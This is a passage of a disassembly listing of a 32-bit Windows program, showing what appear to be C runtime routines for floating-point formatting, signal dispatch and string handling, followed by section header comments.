mov esi, [ebp+var_8]
dec edi
jmp loc_41DEBD
; ---------------------------------------------------------------------------
loc_41DFB2: ; CODE XREF: sub_41DC67+355�j
dec [ebp+var_C]
inc [ebp+var_10]
loc_41DFB8: ; CODE XREF: sub_41DC67+287�j
dec esi
cmp byte ptr [esi], 0
jz short loc_41DFB2
lea eax, [ebp+var_3C]
push eax
push [ebp+var_C]
lea eax, [ebp+var_58]
push eax
call sub_41DB83
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_41DFDD
neg eax
loc_41DFDD: ; CODE XREF: sub_41DC67+372�j
add eax, [ebp+var_10]
cmp [ebp+var_24], ecx
jnz short loc_41DFE8
add eax, [ebp+arg_10]
loc_41DFE8: ; CODE XREF: sub_41DC67+37C�j
cmp [ebp+var_28], ecx
jnz short loc_41DFF0
sub eax, [ebp+arg_14]
loc_41DFF0: ; CODE XREF: sub_41DC67+384�j
cmp eax, 1450h
jg short loc_41E025
cmp eax, 0FFFFEBB0h
jl short loc_41E03C
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_41E7DB
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_41E04B
; ---------------------------------------------------------------------------
loc_41E01C: ; CODE XREF: sub_41DC67+25F�j
mov [ebp+var_18], 4
jmp short loc_41E043
; ---------------------------------------------------------------------------
loc_41E025: ; CODE XREF: sub_41DC67+38E�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_41E04B
; ---------------------------------------------------------------------------
loc_41E03C: ; CODE XREF: sub_41DC67+395�j
mov [ebp+var_18], 1
loc_41E043: ; CODE XREF: sub_41DC67+281�j
; sub_41DC67+3BC�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_41E04B: ; CODE XREF: sub_41DC67+3B3�j
; sub_41DC67+3D3�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_41DC67 endp
; ---------------------------------------------------------------------------
off_41E071 dd offset loc_41DCD4 ; DATA XREF: sub_41DC67+66�r
dd offset loc_41DD27 ; jump table for switch statement
dd offset loc_41DD88
dd offset loc_41DDB3
dd offset loc_41DDEE
dd offset loc_41DE46
dd offset loc_41DE66
dd offset loc_41DEF3
dd offset loc_41DE9E
dd offset loc_41DF58
dd offset loc_41DF40
dd offset loc_41DF10
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0A1 proc near ; CODE XREF: sub_41C7C4+36�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_41E10E
mov byte ptr [ebx+2], 2Dh
jmp short loc_41E112
; ---------------------------------------------------------------------------
loc_41E10E: ; CODE XREF: sub_41E0A1+65�j
mov byte ptr [ebx+2], 20h
loc_41E112: ; CODE XREF: sub_41E0A1+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_41E127
test edi, edi
jnz short loc_41E127
cmp [ebp+arg_0], edi
jz loc_41E21A
loc_41E127: ; CODE XREF: sub_41E0A1+77�j
; sub_41E0A1+7B�j
cmp dx, si
jnz short loc_41E1A4
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_41E140
cmp [ebp+arg_0], 0
jz short loc_41E14F
loc_41E140: ; CODE XREF: sub_41E0A1+97�j
test edi, 40000000h
jnz short loc_41E14F
push offset a1Snan ; "1#SNAN"
jmp short loc_41E195
; ---------------------------------------------------------------------------
loc_41E14F: ; CODE XREF: sub_41E0A1+9D�j
; sub_41E0A1+A5�j
test cx, cx
jz short loc_41E169
cmp edi, 0C0000000h
jnz short loc_41E169
cmp [ebp+arg_0], 0
jnz short loc_41E190
push offset a1Ind ; "1#IND"
jmp short loc_41E178
; ---------------------------------------------------------------------------
loc_41E169: ; CODE XREF: sub_41E0A1+B1�j
; sub_41E0A1+B9�j
cmp edi, eax
jnz short loc_41E190
cmp [ebp+arg_0], 0
jnz short loc_41E190
push offset a1Inf ; "1#INF"
loc_41E178: ; CODE XREF: sub_41E0A1+C6�j
lea eax, [ebx+4]
push eax
call sub_41B390
mov byte ptr [ebx+3], 5
loc_41E185: ; CODE XREF: sub_41E0A1+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_41E2FC
; ---------------------------------------------------------------------------
loc_41E190: ; CODE XREF: sub_41E0A1+BF�j
; sub_41E0A1+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_41E195: ; CODE XREF: sub_41E0A1+AC�j
lea eax, [ebx+4]
push eax
call sub_41B390
mov byte ptr [ebx+3], 6
jmp short loc_41E185
; ---------------------------------------------------------------------------
loc_41E1A4: ; CODE XREF: sub_41E0A1+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_41E7DB
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_41E205
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_41E5A3
pop ecx
pop ecx
loc_41E205: ; CODE XREF: sub_41E0A1+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_41E223
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41E223
loc_41E21A: ; CODE XREF: sub_41E0A1+80�j
mov byte ptr [ebx+4], 30h
jmp loc_41E320
; ---------------------------------------------------------------------------
loc_41E223: ; CODE XREF: sub_41E0A1+16E�j
; sub_41E0A1+177�j
cmp edi, 15h
jle short loc_41E22B
push 15h
pop edi
loc_41E22B: ; CODE XREF: sub_41E0A1+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_41E241: ; CODE XREF: sub_41E0A1+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_41DB28
dec [ebp+arg_8]
pop ecx
jnz short loc_41E241
test esi, esi
jge short loc_41E26B
neg esi
and esi, 0FFh
jle short loc_41E26B
loc_41E25E: ; CODE XREF: sub_41E0A1+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_41DB56
dec esi
pop ecx
jnz short loc_41E25E
loc_41E26B: ; CODE XREF: sub_41E0A1+1B1�j
; sub_41E0A1+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_41E2C8
mov [ebp+var_C], ecx
loc_41E27B: ; CODE XREF: sub_41E0A1+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_41DB28
lea eax, [ebp+var_18]
push eax
call sub_41DB28
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41DACA
lea eax, [ebp+var_18]
push eax
call sub_41DB28
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_41E27B
mov eax, [ebp+arg_8]
loc_41E2C8: ; CODE XREF: sub_41E0A1+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41E315
jmp short loc_41E2DF
; ---------------------------------------------------------------------------
loc_41E2D6: ; CODE XREF: sub_41E0A1+240�j
cmp byte ptr [eax], 39h
jnz short loc_41E2E3
mov byte ptr [eax], 30h
dec eax
loc_41E2DF: ; CODE XREF: sub_41E0A1+233�j
cmp eax, ecx
jnb short loc_41E2D6
loc_41E2E3: ; CODE XREF: sub_41E0A1+238�j
cmp eax, ecx
jnb short loc_41E2EB
inc eax
inc word ptr [ebx]
loc_41E2EB: ; CODE XREF: sub_41E0A1+244�j
inc byte ptr [eax]
loc_41E2ED: ; CODE XREF: sub_41E0A1+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41E2FC: ; CODE XREF: sub_41E0A1+EA�j
mov eax, [ebp+var_8]
loc_41E2FF: ; CODE XREF: sub_41E0A1+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
; ---------------------------------------------------------------------------
loc_41E30F: ; CODE XREF: sub_41E0A1+276�j
cmp byte ptr [eax], 30h
jnz short loc_41E319
dec eax
loc_41E315: ; CODE XREF: sub_41E0A1+231�j
cmp eax, ecx
jnb short loc_41E30F
loc_41E319: ; CODE XREF: sub_41E0A1+271�j
cmp eax, ecx
jnb short loc_41E2ED
mov byte ptr [ecx], 30h
loc_41E320: ; CODE XREF: sub_41E0A1+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_41E2FF
sub_41E0A1 endp
; =============== S U B R O U T I N E =======================================
sub_41E335 proc near ; CODE XREF: sub_41E363+72�p
mov ecx, dword_42D064
mov eax, edx
push edi
loc_41E33E: ; CODE XREF: sub_41E335+19�j
cmp [eax+4], esi
jz short loc_41E350
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_41E33E
loc_41E350: ; CODE XREF: sub_41E335+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_41E360
cmp [eax+4], esi
jz short locret_41E362
loc_41E360: ; CODE XREF: sub_41E335+24�j
xor eax, eax
locret_41E362: ; CODE XREF: sub_41E335+29�j
retn
sub_41E335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E363 proc near ; CODE XREF: sub_418F0B+3F13�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041E4AB SIZE 00000031 BYTES
push 20h
push offset stru_4288C0
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_41E3E5
dec eax
dec eax
jz short loc_41E3C5
sub eax, 4
jz short loc_41E3C5
sub eax, 3
jz short loc_41E3C5
sub eax, 4
jz short loc_41E3B8
sub eax, 6
jz short loc_41E3AB
dec eax
jz short loc_41E39E
or eax, 0FFFFFFFFh
jmp loc_41E4D6
; ---------------------------------------------------------------------------
loc_41E39E: ; CODE XREF: sub_41E363+31�j
mov esi, offset dword_47A2A4
mov edi, dword_47A2A4
jmp short loc_41E3F0
; ---------------------------------------------------------------------------
loc_41E3AB: ; CODE XREF: sub_41E363+2E�j
mov esi, offset dword_47A2A0
mov edi, dword_47A2A0
jmp short loc_41E3F0
; ---------------------------------------------------------------------------
loc_41E3B8: ; CODE XREF: sub_41E363+29�j
mov esi, offset dword_47A2A8
mov edi, dword_47A2A8
jmp short loc_41E3F0
; ---------------------------------------------------------------------------
loc_41E3C5: ; CODE XREF: sub_41E363+1A�j
; sub_41E363+1F�j ...
call sub_415456
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_41E335
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_41E3FA
; ---------------------------------------------------------------------------
loc_41E3E5: ; CODE XREF: sub_41E363+16�j
mov esi, offset dword_47A29C
mov edi, dword_47A29C
loc_41E3F0: ; CODE XREF: sub_41E363+46�j
; sub_41E363+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_41E3FA: ; CODE XREF: sub_41E363+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_41E4D4
cmp edi, ecx
jnz short loc_41E411
push 3
call sub_414544
loc_41E411: ; CODE XREF: sub_41E363+A5�j
cmp [ebp+var_1C], ecx
jz short loc_41E41F
push ecx
call sub_416901
pop ecx
xor ecx, ecx
loc_41E41F: ; CODE XREF: sub_41E363+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41E434
cmp eax, 0Bh
jz short loc_41E434
cmp eax, 4
jnz short loc_41E44F
loc_41E434: ; CODE XREF: sub_41E363+C5�j
; sub_41E363+CA�j
mov edx, [ebx+58h]
mov [ebp+var_28], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41E47B
mov edx, [ebx+5Ch]
mov [ebp+var_2C], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_41E44F: ; CODE XREF: sub_41E363+CF�j
cmp eax, 8
jnz short loc_41E47B
mov eax, dword_42D058
loc_41E459: ; CODE XREF: sub_41E363+116�j
mov [ebp+var_30], eax
mov edx, dword_42D05C
mov esi, dword_42D058
add edx, esi
cmp eax, edx
jge short loc_41E47D
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_41E459
; ---------------------------------------------------------------------------
loc_41E47B: ; CODE XREF: sub_41E363+DD�j
; sub_41E363+EF�j
mov [esi], ecx
loc_41E47D: ; CODE XREF: sub_41E363+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E49E
cmp [ebp+arg_0], 8
jnz short loc_41E4AB
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_41E4B0
sub_41E363 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E496 proc near ; DATA XREF: .rdata:stru_4288C0�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_41E496 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E49E proc near ; CODE XREF: sub_41E363+11E�p
cmp [ebp-1Ch], ecx
jz short locret_41E4AA
push ecx
call sub_41686D
pop ecx
locret_41E4AA: ; CODE XREF: sub_41E49E+3�j
retn
sub_41E49E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E363
loc_41E4AB: ; CODE XREF: sub_41E363+127�j
push [ebp+arg_0]
call edi
loc_41E4B0: ; CODE XREF: sub_41E363+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41E4C3
cmp eax, 0Bh
jz short loc_41E4C3
cmp eax, 4
jnz short loc_41E4D4
loc_41E4C3: ; CODE XREF: sub_41E363+154�j
; sub_41E363+159�j
mov ecx, [ebp+var_28]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41E4D4
mov eax, [ebp+var_2C]
mov [ebx+5Ch], eax
loc_41E4D4: ; CODE XREF: sub_41E363+9D�j
; sub_41E363+15E�j ...
xor eax, eax
loc_41E4D6: ; CODE XREF: sub_41E363+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E363
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_41E53A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_41E4FC: ; CODE XREF: .text:0041E529�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_41E52B
or al, al
jz short loc_41E52B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_41E518
cmp ah, bl
ja short loc_41E518
add ah, dh
loc_41E518: ; CODE XREF: .text:0041E510�j
; .text:0041E514�j
cmp al, bh
jb short loc_41E522
cmp al, bl
ja short loc_41E522
add al, dh
loc_41E522: ; CODE XREF: .text:0041E51A�j
; .text:0041E51E�j
cmp ah, al
jnz short loc_41E531
sub ecx, 1
jnz short loc_41E4FC
loc_41E52B: ; CODE XREF: .text:0041E502�j
; .text:0041E506�j
xor ecx, ecx
cmp ah, al
jz short loc_41E53A
loc_41E531: ; CODE XREF: .text:0041E524�j
mov ecx, 0FFFFFFFFh
jb short loc_41E53A
neg ecx
loc_41E53A: ; CODE XREF: .text:0041E4EB�j
; .text:0041E52F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41E541 proc near ; CODE XREF: sub_41D96E+73�p
; sub_41D96E+C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea eax, [eax+eax*8]
lea edx, [ecx+eax*4+4]
mov cl, [edx]
xor eax, eax
mov al, cl
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41E577
and cl, 7Fh
jmp short loc_41E584
; ---------------------------------------------------------------------------
loc_41E577: ; CODE XREF: sub_41E541+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41E593
or cl, 80h
loc_41E584: ; CODE XREF: sub_41E541+34�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E593: ; CODE XREF: sub_41E541+3E�j
call sub_417C70
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_41E541 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5A3 proc near ; CODE XREF: sub_41E0A1+15D�p
; sub_41E7DB+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41E7B0
cmp cx, 7FFFh
jnb loc_41E7B0
cmp dx, 0BFFDh
ja loc_41E7B0
cmp dx, 3FBFh
ja short loc_41E619
xor eax, eax
jmp short loc_41E653
; ---------------------------------------------------------------------------
loc_41E619: ; CODE XREF: sub_41E5A3+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41E63B
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_41E63D
cmp [esi+4], eax
jnz short loc_41E63D
cmp [esi], eax
jnz short loc_41E63D
jmp loc_41E7AA
; ---------------------------------------------------------------------------
loc_41E63B: ; CODE XREF: sub_41E5A3+7E�j
xor eax, eax
loc_41E63D: ; CODE XREF: sub_41E5A3+88�j
; sub_41E5A3+8D�j ...
cmp cx, ax
jnz short loc_41E660
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41E660
cmp [ebx+4], eax
jnz short loc_41E660
cmp [ebx], eax
jnz short loc_41E660
loc_41E653: ; CODE XREF: sub_41E5A3+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41E7CB
; ---------------------------------------------------------------------------
loc_41E660: ; CODE XREF: sub_41E5A3+9D�j
; sub_41E5A3+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_41E670: ; CODE XREF: sub_41E5A3+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41E6C4
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_41E68C: ; CODE XREF: sub_41E5A3+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41DAA9
add esp, 0Ch
test eax, eax
jz short loc_41E6B7
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_41E6B7: ; CODE XREF: sub_41E5A3+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_41E68C
loc_41E6C4: ; CODE XREF: sub_41E5A3+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41E670
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41E707
loc_41E6E2: ; CODE XREF: sub_41E5A3+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_41E700
lea eax, [ebp+var_28]
push eax
call sub_41DB28
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_41E6E2
loc_41E700: ; CODE XREF: sub_41E5A3+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41E740
loc_41E707: ; CODE XREF: sub_41E5A3+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41E740
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_41E720: ; CODE XREF: sub_41E5A3+191�j
test byte ptr [ebp+var_28], 1
jz short loc_41E729
inc [ebp+var_18]
loc_41E729: ; CODE XREF: sub_41E5A3+181�j
lea eax, [ebp+var_28]
push eax
call sub_41DB56
dec ebx
pop ecx
jnz short loc_41E720
cmp [ebp+var_18], 0
jz short loc_41E740
or byte ptr [ebp+var_28], 1
loc_41E740: ; CODE XREF: sub_41E5A3+162�j
; sub_41E5A3+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_41E757
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41E78C
loc_41E757: ; CODE XREF: sub_41E5A3+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_41E789
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41E784
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_41E77E
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_41E78C
; ---------------------------------------------------------------------------
loc_41E77E: ; CODE XREF: sub_41E5A3+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_41E78C
; ---------------------------------------------------------------------------
loc_41E784: ; CODE XREF: sub_41E5A3+1C2�j
inc [ebp+var_24+2]
jmp short loc_41E78C
; ---------------------------------------------------------------------------
loc_41E789: ; CODE XREF: sub_41E5A3+1B8�j
inc [ebp+var_28+2]
loc_41E78C: ; CODE XREF: sub_41E5A3+1B2�j
; sub_41E5A3+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41E7B0
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_41E7AA: ; CODE XREF: sub_41E5A3+93�j
mov [esi+0Ah], ax
jmp short loc_41E7CB
; ---------------------------------------------------------------------------
loc_41E7B0: ; CODE XREF: sub_41E5A3+4F�j
; sub_41E5A3+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41E7CB: ; CODE XREF: sub_41E5A3+B8�j
; sub_41E5A3+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_41E5A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7DB proc near ; CODE XREF: sub_41DC67+39F�p
; sub_41E0A1+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_42D430
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_41E859
jge short loc_41E809
neg [ebp+arg_4]
mov ebx, offset dword_42D590
sub ebx, 60h
loc_41E809: ; CODE XREF: sub_41E7DB+21�j
cmp [ebp+arg_8], ecx
jnz short loc_41E814
mov eax, [ebp+arg_0]
mov [eax], cx
loc_41E814: ; CODE XREF: sub_41E7DB+31�j
cmp [ebp+arg_4], ecx
jz short loc_41E859
push esi
push edi
loc_41E81B: ; CODE XREF: sub_41E7DB+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_41E852
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_41E845
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_41E845: ; CODE XREF: sub_41E7DB+5C�j
push esi
push [ebp+arg_0]
call sub_41E5A3
pop ecx
pop ecx
xor ecx, ecx
loc_41E852: ; CODE XREF: sub_41E7DB+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_41E81B
pop edi
pop esi
loc_41E859: ; CODE XREF: sub_41E7DB+1F�j
; sub_41E7DB+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_4182D6
leave
retn
sub_41E7DB endp
; =============== S U B R O U T I N E =======================================
sub_41E867 proc near ; CODE XREF: sub_40556E+31�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41E88E
push esi
call sub_416000
inc eax
push eax
call sub_41344D
test eax, eax
pop ecx
pop ecx
jz short loc_41E88E
push esi
push eax
call sub_41B390
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E88E: ; CODE XREF: sub_41E867+7�j
; sub_41E867+1A�j
xor eax, eax
pop esi
retn
sub_41E867 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E8A0 proc near ; CODE XREF: sub_402B1D+14A�p
jmp ds:dword_41F1DC
sub_41E8A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E8A6 proc near ; CODE XREF: sub_413AD5+24�p
; sub_413E04+13�p
jmp ds:dword_41F144
sub_41E8A6 endp
; ---------------------------------------------------------------------------
mov eax, dword_4338C0
and eax, 0FFFFFFFEh
mov dword_4338C0, eax
retn
; ---------------------------------------------------------------------------
loc_41E8BA: ; DATA XREF: sub_405F46�o
mov eax, offset dword_4288E4
jmp loc_413B27
_text ends
; Section 2. (virtual address 0001F000)
; Virtual size : 0000A356 ( 41814.)
; Section size in file : 0000A356 ( 41814.)
; Offset to raw data for section: 0001F000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rdata segment para public 'CODE' use32
